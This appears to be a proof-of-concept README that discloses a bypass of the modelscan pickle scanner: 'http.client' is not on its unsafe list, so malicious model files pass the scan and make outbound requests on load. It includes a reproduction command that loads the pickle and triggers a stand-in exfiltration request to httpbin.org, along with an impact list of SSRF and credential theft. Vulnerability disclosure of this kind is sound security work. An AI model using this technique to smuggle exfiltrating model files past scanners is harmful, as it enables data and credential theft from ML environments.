| --- |
| tags: |
| - security-research |
| - modelscan-bypass |
| license: mit |
| --- |
| |
| # ModelScan Bypass PoC: http.client SSRF |
|
|
| **Security research only. Do not use maliciously.** |
|
|
| This repository demonstrates a bypass in ProtectAI's modelscan scanner (v0.8.8). |
|
|
| ## Vulnerability |
|
|
| modelscan blocks `httplib` (Python 2 module name) in its `unsafe_globals` list, |
| but does NOT block `http.client` (the Python 3 equivalent module). |
|
|
| This allows creation of pickle files that: |
| 1. Create HTTP/HTTPS connections to arbitrary servers |
| 2. Send HTTP requests with attacker-controlled data |
| 3. Exfiltrate data from the model loading environment |
|
|
| All while modelscan reports "No issues found". |
|
|
| ## Files |
|
|
| - `model.pkl` — Pickle file that sends an HTTP GET request on load |
| - `pytorch_model.bin` — Same payload in PyTorch format |
|
|
| ## Reproduction |
|
|
| ```bash |
| pip install modelscan==0.8.8 |
| modelscan scan -p model.pkl |
| # Output: "No issues found" |
| |
| python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())" |
| # Sends HTTP request to httpbin.org/get?exfil=pwned |
| ``` |
|
|
| ## Impact |
|
|
| - SSRF from model loading |
| - Data exfiltration from ML environments |
| - Credential theft via outbound HTTP requests |
|
|